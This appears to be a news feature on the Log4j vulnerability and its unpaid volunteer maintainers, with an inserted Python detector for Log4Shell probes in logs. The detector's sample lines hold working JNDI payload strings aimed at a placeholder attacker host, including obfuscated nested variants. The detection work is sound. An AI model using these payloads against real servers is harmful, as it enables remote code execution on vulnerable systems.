Exploiting the Log4j vulnerability is easy. An attacker sends a crafted string to a vulnerable system, and as soon as the application logs it, the attacker can run any code they want on that system. Some of the first attacks were kids pasting malicious strings into Minecraft servers. Hackers, including groups linked to China and Iran, are now scanning for any device they can find running the flawed code.
And there is no clear end in sight. The Log4j issue amounts to a long-term security crisis that is expected to last for months or years. Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), said it was “one of the most serious flaws” she had ever seen.
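The article describes the attack only as “a string of malicious characters”. The publicly documented mechanism behind it (CVE-2021-44228, “Log4Shell”) is a Log4j lookup of the form ${jndi:...} embedded in any text the application logs. The detector below is added here as an illustration; it is not code from the article or from the Log4j project. It scans constructed log lines for that lookup and undoes the nesting tricks attackers used to hide the keyword, such as ${${lower:j}ndi:...} and ${${::-j}${::-n}${::-d}${::-i}:...}. The sample lines and the hostname attacker.example are invented.

```python
import re
from typing import Iterable, List

# Matches the innermost ${...} lookup, i.e. one whose body contains no
# further "${" or "}". Resolving these from the inside out undoes nesting.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A lookup that resolves to a JNDI reference is the Log4Shell trigger.
# Assumption: the article does not name the mechanism; this is the one
# publicly documented for CVE-2021-44228. Log4j lowercases the lookup
# prefix, so the match is case-insensitive.
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve_inner(match: re.Match) -> str:
    """Reduce one innermost lookup the way an attacker expects Log4j to.

    Only the obfuscation idioms seen in the wild are modelled: lower/upper
    case conversion and the ':-default' fallback syntax (which also covers
    the empty-prefix trick ${::-j}). Anything else, including the jndi
    lookup itself, is left in place so the final check can see it.
    """
    body = match.group(1)
    key = body.lower()
    if key.startswith("jndi:"):
        return match.group(0)           # keep: this is what we want to detect
    if key.startswith("lower:"):
        return body[len("lower:"):].lower()
    if key.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NOPE:-j}, ${sys:NOPE:-j} and ${::-j} all fall back to "j"
        return body.split(":-", 1)[1]
    return match.group(0)               # unknown lookup such as ${date:yyyy}: keep


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        reduced = _INNER_LOOKUP.sub(_resolve_inner, text)
        if reduced == text:
            break
        text = reduced
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a (possibly obfuscated) JNDI lookup string."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan_lines(lines: Iterable[str]) -> List[str]:
    """Return the lines that look like Log4Shell exploitation attempts."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed sample access-log lines (not real traffic); attacker.example
# is a placeholder, not real attacker infrastructure.
SAMPLE_LOG_LINES = [
    'GET /index.html HTTP/1.1 "Mozilla/5.0"',
    'GET / HTTP/1.1 "${jndi:ldap://attacker.example/a}"',
    'GET / HTTP/1.1 "${${lower:j}ndi:ldap://attacker.example/a}"',
    'GET / HTTP/1.1 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    'GET / HTTP/1.1 "${${env:NOPE:-j}ndi:${lower:RMI}://attacker.example/a}"',
    'GET /report?period=${date:yyyy-MM} HTTP/1.1 "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG_LINES):
        print("suspicious:", hit)
```

Run over the sample, four of the six lines are flagged; the plain request and the benign ${date:...} lookup are not. A detector like this is a triage aid for hunting attempts in existing logs; it does not replace upgrading Log4j, since new nesting tricks can always be invented.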
For something so important, you might expect the world’s largest tech companies and governments to contract hundreds of highly paid experts to quickly fix the flaw.
The reality is different: Log4j, long a core piece of internet infrastructure, began as a volunteer project and is still largely run unpaid, even though companies worth millions and billions of dollars depend on it and profit from it every day. Yazıcı and his team are fixing it for nothing.
This strange situation is routine in the world of open source software, software whose code anyone can inspect, modify and use. It is a decades-old idea that has become critical to the workings of the internet. When things go right, open source is a collaborative triumph. When something goes wrong, it is a far-reaching danger.
“Open source runs the internet, and thus the economy,” says Filippo Valsorda, a developer working on open source projects at Google. However, he explains, “It is very common for even basic infrastructure projects to have a small team of maintainers, or even a single maintainer who is not paid to work on that project.”
“The team works around the clock,” Yazıcı told me via email when I first contacted him. “And my shift from 6 a.m. to 4 a.m. just ended (no, that is not a typo).”
In the middle of these long days, Yazıcı also took time to push back at critics on Twitter: “Log4j maintainers have been sleeplessly working on mitigation measures: fixes, docs, CVEs, responses to queries, etc. However, nothing is stopping people from attacking us, for work we’re not paid for, for a feature we don’t all like but need to retain due to backward compatibility concerns.”